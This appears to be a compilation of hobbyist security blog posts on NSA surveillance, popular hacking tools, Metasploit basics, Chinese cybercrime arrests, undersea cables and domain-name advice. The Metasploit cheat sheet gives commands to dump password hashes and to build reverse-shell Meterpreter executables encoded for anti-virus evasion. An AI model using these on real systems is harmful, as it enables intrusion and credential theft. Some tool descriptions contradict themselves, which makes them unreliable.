We all know NSA is powerful. Getting into your email accounts and accessing all the private information that include your pictures, voice calls, private webcam photos (dick picks too), your passwords and they can even watch your Skype sessions just by typing your name and email address. And this is just the beginning. No one knows how far is NSA’s reach and if something called “Private” still exists with the national agency lurking in the shadow keeping an eye over you 24/7.

Now the question arises is “Is there any extent to NSA’s breach?” and more importantly, “How do they DO that?” The answer to the first question is a grim NO. And the next one is in a top secret and classified 48 paged documents provided by none other than NSA whistleblower Edward Snowden. The documents have been published by The Intercept on Wednesday that date back to 2013. These documents have once again brought NSA under scrutiny and their spying policies. The keyword in that pile of documents is XKEYSCORE.

XKEYSCORE is NSA’s tool of mass surveillance and it can collect and store data from across the globe for 3 to 5 days, and the important meta data up to 45 days. The documents reveal that there are tens of billions of records stored in the NSA’s database while the XKEYSCORE program runs across thousands of servers globally, thus increasing its processing power and storage capabilities.

NSA has itself referred XKEYSCORE as its “widest reaching” system. The government agency has previously used XKEYSCORE to steal millions of encryption keys that are used to protect cell phone privacy by hacking inside the world’s biggest SIM card provider Gemalto. The program had been even used to spy on U.N. Secretory General Ban Ki-moon to know his points of discussion before his meeting with President Barack Obama.

By Jeet Rami

Every task requires a good set of tools.This because having right tools in hand one can save much of its energy and time.In the world of Cyber Hacking (“Cyber Security” formally) there are millions of tools which are available on the Internet either as Freewares or as Sharewares.

If you are security researcher, pentester or a system admin, you need to have this on your PCs/laptops to find the vulnerabilities and plug them. Concise Courses conducted an online poll to determine top ten hacking tools out of some of the famous ones. Here is the list which came out the winner on the poll.

1. Nmap:  Network Mapper

Abbreviated as nmap is a versatile tool for Network Security, plus it is free and open source.It  is largely used by network administrators for network discovery and security auditing. System admins use nmap for network inventory, determining open ports, managing service upgrade schedules, and monitoring host(A term used for “a computer on a network”) or service uptime. The tool uses raw IP packets in many creative ways to determine what hosts are available on the network, what services (application name and version) they offer,which type of protocols are being used for providing the services,what operating systems (and OS versions and possible patches) and what type and version of packet filters/ firewalls are being used by the target.

2. Metasploit:

In previous article I tech you metasploit you can read previous article for understand in brief. A tool for exploiting (Utilising network weakness for making a “backdoor”) vulnerabilities (Weak Points) on Network. This tool is neither free nor open source. But when it comes to features offered it deserves the price it claims. The Metasploit Project is a hugely popular pentesting (penetration testing) or hacking tool that is used by cybersecurity professionals and ethical hackers. Metasploit is essentially a computer security project that supplies information about known security vulnerabilities and helps to formulate penetration testing and IDS testing.

3. Cain and Abel:

Cain & Abel is a password recovery tool that is mostly used for Microsoft Operating Systems. This popular hacking tool allows the user to seek the recovery of various kind of passwords by sniffing the network(capturing some of the data packets), cracking encrypted passwords using Dictionary, Brute-Force(Generation of hashes out of words and then comparison of encrypted hash with the generated one,this method takes less time than dictionary attack method) and Cryptanalysis attacks. Cain, as it is often referred to, can also record VoIP(Voice over IP protocol,used for making calls over using internet) conversations, decode hashed scrambled passwords, recover wireless network keys and more.It can crack various types of hashes including NTLM,MD2,MD5,SHA-1,SHA-2 and many more.These functionalities make Cain and Abel one of the best password recovery tool.

4. Angry IP Scanner: 

Angry IP Scanner, also known as ‘ipscan’ is a freely available (open-source and cross-platform) hacking network scanner that is both fast and easy to use. The main purpose of this hacking tool is to scan IP addresses and ports to find open doors and ports. Worth noting that Angry IP Scanner also has a bunch of other uses as well. Common users of this hacking tool include network administrators and system engineers.

5.John The Ripper: 

John the Ripper is a popular password cracking pentesting tool that is most commonly used to perform dictionary attacks. John the Ripper takes text string samples (from a text file, referred to as a wordlist, containing popular and complex words found in a dictionary or real passwords cracked before), encrypting it in the same way as the password being cracked (including both the encryption algorithm and key), and comparing the output to the encrypted string. This tool can also be used to perform a variety of alterations to dictionary attacks.Including Brute Force and Rainbow attacks.

6. THC Hydra:

Although often considered as yet another password cracker, THC Hydra is hugely popular and has a very active and experienced development team. Essentially THC Hydra is a fast and stable Network Login Hacking Tool that will use dictionary or brute-force attacks to try various password and login combinations against an log in page. This hacking tool supports a wide set of protocols including Mail (POP3, IMAP, etc.), Databases, LDAP(Lightweight Directory Access Protocol),SMB, VNC, and SSH(Secure Shell,used by VPN Softwares).

7. Burp Suite:

A pentesting tool,Burp Suite has several features that can help the penetration tester or ethical hacker. Two commonly used applications used within this tool include the ‘Burp Suite Spider’ which can enumerate and map out the various pages and parameters of a web site by examining cookies and initiates connections with these web applications, and the ‘Intruder’ which performs automated attacks on web applications.

8. Nessus Remote Security Scanner:

Recently went closed source, but is still essentially free. Works with a client-server framework. Nessus is the worlds Nessus Remote Security Scanner most popular vulnerability scanner used in over 75,000 organizations world-wide. Many of the worlds largest organizations are realizing significant cost savings by using Nessus to audit business-critical enterprise devices and applications. (This tool is not in the Concise list)

9. Ettercap:

Ettercap has a huge following and is widely used by cyber security professionals. Ettercap works by placing the user’s network interface into promiscuous mode and by ARP poisoning(ARP : Address resolution protocol is used to determine a host’s MAC address (address of its Network Interface Card) by knowing its IP address. ARP poisoning is a process where a hacker gives wrong information of either its MAC or IP address to the network.) the target machines, i.e. facilitating a ‘Man In The Middle’ or MITM attack. Once successful Ettercap (and the hacker) can deploy various attacks on the victims. A popular feature about Ettercap is its’ ability to support various plugins.

10. Wapiti:

Wapiti has a very loyal following. As a pentesting tool (or framework) Wapiti is able to scan and detect hundreds of possible vulnerabilities. Essentially this Multi Purpose Hacker Tools can audit the security of web applications by performing “black-box” scans, i.e. it does not study the source code of the application but will scan the HTML pages of the application seeking scripts and forms where it can inject data.

If you have any favourite tool of your own which we have not mentioned in the article, kindly mention it in the comments so that we can include it in our next list.

By Jeet Rami

Metaspoit Framework is a open source penetration tool used for developing and executing exploit code against a remote target machine it, Metasploit frame work has the world’s largest database of public, tested exploits. In simple words, Metasploit can be used to test the Vulnerability of computer systems in order to protect them and on the other hand it can also be used to break into remote systems.

Its a powerful tool used for penetration testing. Learning to work with metasploit needs a lot of efforts and time. Ofcourse to can learn metasploit overnight, it needs lots of practice and patience.

Just give a look at following basic steps for beginners to break into a system using metasploit after gathering some information about the target system.

1. Select a right exploit and then set the target.
2.Verify the exploit options to determine whether the target system is vulnerable to the exploit.
3.Select a payload
4.Execute the exploit.

You must be confused !!!!

Now carefully read the following basic terms to get an idea about these four steps mentioned above .I have defined the terms technically and side by side explained in layman language to clarify the things. I have taken an example that an attacker wants to break into a house . I hope my this approach will give you a great idea about these basic terms .

Vulnerability -A weakness which allows an attacker to break into or compromise asystem’s security.

Like the main gate of house with a weak lock (can be easily opened) , a glass window of house(can be easily broken) etc can be the vulnerabilities in the systems which make it easy for an attacker to break into.

Exploit – Code which allows an attacker to take advantage of a vulnerability system.

The set of different keys which he can try one by one to open the lock , the hammer with him which he can use to break the glass window etc can be the exploits.

Payload- Actual code which runs on the system after exploitation

Now Finally after exploiting the vulnerability and breaking in , he can have different things to do. He can Steal Money destroy the things or just can give a look and come back.. Deciding this is what we mean by setting the Payload.

I hope its enough friends, You will learn more with further tutorials when you will start working with metasploit practically.

Friends in previous article I explain what is metasploit. Today in this article I tech you metasploit cheat sheet. Now we start....

Download Cheat Sheet: Metasploit

Meterpreter Post Modules

With an available Meterpreter session, post modules can be run on the target machine.

Post Modules from Meterpreter
meterpreter > run post/multi/gather/env

Post Modules on a Backgrounded Session
msf > use post/windows/gather/hashdump
msf > show options
msf > set SESSION 1
msf > run

Useful Auxiliary Modules

Port Scanner:
msf > use auxiliary/scanner/portscan/

tcp
msf > set RHOSTS 10.10.10.0/24
msf > run

DNS Enumeration
msf > use auxiliary/gather/dns_enum
msf > set DOMAIN target.tgt
msf > run

FTP Server
msf > use auxiliary/server/ftp
msf > set FTPROOT /tmp/ftproot
msf > run

Proxy Server
msf > use auxiliary/server/socks4
msf > run

Any proxied traffic that matches the subnet of a route will be routed through the session specified by route.
Use proxychains configured for socks4 to route any application’s traffic through a Meterpreter session.

msfvenom

The msfvenom tool can be used to generate Metasploit payloads (such as Meterpreter) as standalone files and optionally encode them. This tool replaces the former
msfpayload and msfencode tools. Run with
‘’-l payloads’ to get a list of payloads.

$ msfvenom –p [PayloadPath]
–f [FormatType]
LHOST=[LocalHost (if reverse conn.)]
LPORT=[LocalPort]

Example
Reverse Meterpreter payload as an executable and
redirected into a file:
$ msfvenom -p windows/meterpreter/
reverse_tcp -f exe LHOST=10.1.1.1
LPORT=4444 > met.exe

Format Options (specified with –f)
–help-formats – List available output formats
exe – Executable
pl – Perl
rb – Ruby
raw – Raw shellcode
c – C code

Encoding Payloads with msfvenom
The msfvenom tool can be used to apply a level of encoding for anti-virus bypass. Run with ‘-l encoders‘ to get a list of encoders.

$ msfvenom -p [Payload] -e [Encoder] -f
[FormatType] -i [EncodeInterations]
LHOST=[LocalHost (if reverse conn.)]
LPORT=[LocalPort]

Example
Encode a payload from msfpayload 5 times using shikataga-nai encoder and output as executable:
$ msfvenom -p windows/meterpreter/
reverse_tcp -i 5 -e x86/shikata_ga_nai -f
exe LHOST=10.1.1.1 LPORT=4444 > mal.exe

Metasploit Console Basics (msfconsole)

Search for module:
msf > search [regex]

Specify and exploit to use:
msf > use exploit/[ExploitPath]

Specify a Payload to use:
msf > set PAYLOAD [PayloadPath]

Show options for the current modules:
msf > show options

By Jeet Rami

China Police has arrested nearly 15,000 people on suspicion of cyber crimes as part of a sweeping six-month probe called “Operation Clean Internet”, according to a statement from the Ministry of Public Security.It also added that the suspects have been arrested for their involvement in cyber crimes that “jeopardized Internet security”.

In July, China launched a six-month campaign codenamed “Cleaning the Internet” to fight against online hackers. Police investigated 66,000 websites including hacking, online fraud and the illegal sale of personal information.They targeted websites providing “illegal and harmful information” besides advertisements for pornography, explosives and firearms and gambling.

In 2015 alone Chinese authorities have deleted 758,000 pieces of illegal information from Chinese websites.

By Jeet Rami

Today were are sharing a unique map that shows the submarine internet cables that power your internet. These cables are spread all around the globe and transmit about 99 percent of all international data.

World’s internet is powered by the complex network of internet cables hidden inside the mighty oceans of Earth. These submarine cables lying on the ocean bed power your internet. Did you know the fact that these cables are mot much thicker than 8 cm and they transmit about 99 percent of all international data?

Some of these cables are at depths up to 8,000 metres and the very first instance of submarine internet cables is found in the 1850s. These internet cables connect different countries, islands and continents. Notably, the longest of them stretches from Germany to Korea and measures about 40,000 km.

At many places, the cables are simply in the form of straight lines. However, at many places around smaller locations and uneven areas, the network gets much more complicated. These cables are installed using the special cable-layer boats.

Using the resources from the Global Bandwidth Research Service, an animated map has been drawn in sponsorship with Huawei Marine. You can take a look at this map below or directly visit the website http://www.submarinecablemap.com/. Take a look at this map and get to know how your country gets the internet.

By Jeet Rami

1. Unique

Your domain name is a huge part of your organization’s identity – so make sure that it is as unique as your organization.

Don’t pick something that is easily confused with a competitor’s site or could lead to a different company all together; make it unique. Try to avoid pluralization (ie; greatshoe.com vs. greatshoes.com) because your actual name is already taken – this will only lead to lost traffic for you and a potential higher bounce rate due to people landing on your site accidentally.

2. Easy to remember

Short and sweet is the name of the game here.

The more letters and words that make up your domain, the higher the odds that someone will get it wrong or forget it. Also, make your domain name relevant to your business so that it is easy to remember. here’s what folks from Grasshopper said about having your name relevant to your business.

3. Use a domain tool

There are a slew of domain name tools available for free on the Web. These tools can help to break writers block and suggest some quality potential domain names for your review.

4. Avoid copyright infringement

Don’t use a trademarked or copyrighted phrase for your domain name: just don’t. Before you register your domain, run it through the free checkers available athttp://www.copyright.gov/records/ and http://www.uspto.gov/trademarks/ to ensure you’re in the clear – it’s well worth the extra few minutes.

5. Keyword relevant

In the past, having at least one of your keywords in your domain name was paramount, however, due to the Google EMD update, this is an outdated rule. The Google EMD update – short for Exact Match Domain – is a filter that Google launched in 2012 to ensure that sites were not receiving elevated search result rankings simply because their domain name included a relevant keyword. That having been said, it is still a good idea to theme your domain name around a relevant keyword, as it will give first time visitors an immediate idea as to exactly what you offer.

6. Write it out and read it repeatedly before purchasing

One of the great things about a domain name is that it’s yours forever (as long as you keep up the payments, anyways). One of the bad things about a domain name is that you can’t change it after you purchase it. That said, if your business is named Dickson Web, carefully consider your domain name before purchasing –www.dicksonweb.com is likely to attract a whole other kind of audience.

Avoid a PR catastrophe by writing your potential domain name out and reading it repeatedly before making the purchase. Do one better and run it by a few good friends or family members before committing.

7. Avoid punctuation and numbers

Punctuation is confusing – simply put. Most reputable URLs are plain text and putting in a hyphen is only going to increase your chances of losing traffic to other sites; after all people are used to typing plain text in the URL bar. Also, avoid numbers whenever possible – though there may be an understandable exception to the rule if your business name includes a number.

8. Buy other similar domains and use it as redirects

When you consider the investment you have already made in your organization. Protect your brand and capture all potentially misdirected traffic by also purchasing the domains that are similar to your actual domain name.

9. Be wary of the domain extension

There are .com, .net, .org, .biz, and a slew of other domain extensions. While .net may save you a few bucks, at the end of the day is it really worth the savings? While there are some cases that a .biz may have merit – and certainly .org has its purposes – most of the time, a .com is going to be your best bet. Don’t fall into purchasing an off extension simply because your domain is already taken as a .com – instead, rethink your domain name unless there is a more prevalent reason for choosing an alternate extension.

10. Be direct

Obviously, there are certain phrases or words that are bound to draw people in… but unless they’re your target audience, all the traffic in the world won’t make a difference. Make sure that your domain name is to the point and direct about who you are and/ or what it is that you provide.

By Jeet Rami